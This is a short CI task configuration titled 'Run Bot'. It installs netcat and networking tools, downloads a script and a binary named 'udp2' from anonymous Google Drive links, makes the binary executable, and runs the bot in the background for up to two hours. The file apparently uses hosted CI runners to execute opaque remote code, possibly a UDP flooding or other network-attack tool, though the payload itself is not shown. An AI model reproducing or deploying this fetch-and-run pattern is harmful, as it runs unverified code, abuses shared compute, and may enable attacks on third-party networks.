task:
  name: Run Bot
  timeout_in: 2h
  container:
    image: ubuntu:22.04

  install_script:
    - apt-get update -y
    - apt-get install -y debootstrap proot wget curl ca-certificates netcat iproute2 python3 python3-pip
    - pip3 install --upgrade pip
    - pip3 install gdown psutil requests

  script:
    - gdown --id 1zAx6zps-jxlxpMpKC4wCX3nOScGNSwX_ -O bot.py
    - gdown "https://drive.google.com/uc?id=1_Gui4ssDq4ZMtNn4PQ9Y6Qnyn02Vzw1m" -O udp2
    - chmod +x udp2
    # Chạy bot.py bằng nohup để chạy background
    - nohup python3 bot.py > bot.log 2>&1 &
    - echo "Bot is running in background..."
